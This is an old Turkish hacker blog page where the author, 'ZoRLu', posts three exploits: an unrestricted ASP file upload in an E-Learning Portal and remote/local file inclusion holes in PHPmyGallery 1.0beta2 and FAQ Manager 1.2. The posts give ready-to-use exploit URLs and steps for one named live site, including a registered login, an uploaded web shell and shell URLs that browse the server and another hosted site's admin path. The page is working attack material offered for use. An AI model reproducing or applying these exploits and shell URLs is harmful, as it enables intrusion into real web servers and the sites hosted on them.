"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

local file include etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
local file include etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

22 Aralık 2008 Pazartesi

E-Learning Portal Remote File Upload


E-Learning Portal Remote File Upload

link 1: http://www.exploiter5.com/all.php?id=47

link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt

Discovered By: ZoRLu

exp:

http://www.preprojects.com/elearning/uploaded/your_shell.asp

you register to site

login this site

after upload you_shell.asp

exp for demo:

register:

http://www.preprojects.com/elearning/new_student.asp

login:

role: select STUDENT

user: zorlu

passwd: zorlu1


shell

http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )

server daki siteler:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git


buda golden gate:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM

9 Aralık 2008 Salı

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7392

Discovered By: ZoRLu

file:

_conf/core/common-tpl-vars.php

c0de:

require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )

rfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?

lfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]

25 Kasım 2008 Salı

FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability

FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability

link: http://www.milw0rm.com/exploits/7229

Discovered By: ZoRLu

file:

include/header.php

exp:

http://localhost/script/include/header.php?config_path=ZoRLu.txt?

 
Dizi